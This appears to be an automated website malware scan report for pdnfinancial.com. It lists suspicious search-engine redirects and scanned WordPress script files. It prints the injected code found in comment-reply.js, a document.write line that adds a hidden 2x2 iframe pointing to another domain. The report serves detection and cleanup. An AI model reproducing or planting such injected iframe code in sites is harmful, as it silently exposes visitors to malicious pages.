Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.pdnfinancial.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.pdnfinancial.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Mar 2015 05:47:19 GMT Location: http://gabriellerosephotography.com/emas.html?h=1230337 Server: Apache Content-Length: 309 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://gabriellerosephotography.com/emas.html?h=1230337 (imitation of visitor from search engine) GET /emas.html?h=1230337 HTTP/1.1 Host: gabriellerosephotography.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Mar 2015 05:47:20 GMT Location: http://just15.justhost.com/suspended.page/disabled.cgi/gabriellerosephotography.com?h=1230337 Server: Apache Content-Length: 355 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.pdnfinancial.com/ | 200 OK Content-Length: 18964 Content-Type: text/html | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery-1.7.2.min.js?ver=1.7.2 | 200 OK Content-Length: 94917 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.8.5.571548 | 200 OK Content-Length: 27244 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/jquery.infieldlabel.min.js?ver=3.8.8.5.571548 | 200 OK Content-Length: 1787 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/ajax.js?ver=3.8.8.5.571548 | 200 OK Content-Length: 2693 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/index.php?wpsc_user_dynamic_js=true&ver=3.8.8.5.571548 | 200 OK Content-Length: 1028 Content-Type: text/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.8.5571548 | 200 OK Content-Length: 14672 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 14444 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/modernizr.custom.all.min.js?ver=2.5.2 | 200 OK Content-Length: 15245 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/css3MediaQueries.min.js?ver=1.0.0 | 200 OK Content-Length: 14106 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery.easing.min.js?ver=1.3.0 | 200 OK Content-Length: 3759 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-includes/js/comment-reply.js?ver=3.4.1 | 200 OK Content-Length: 959 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1230337></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}};
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1230337 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1230337>
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery.prettyPhoto.min.js?ver=3.1.2 | 200 OK Content-Length: 23645 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery.script.js?ver=1.0.0 | 200 OK Content-Length: 40722 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pdnfinancial.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pdnfinancial.com/
Result: pdnfinancial.com is not infected or malware details are not published yet.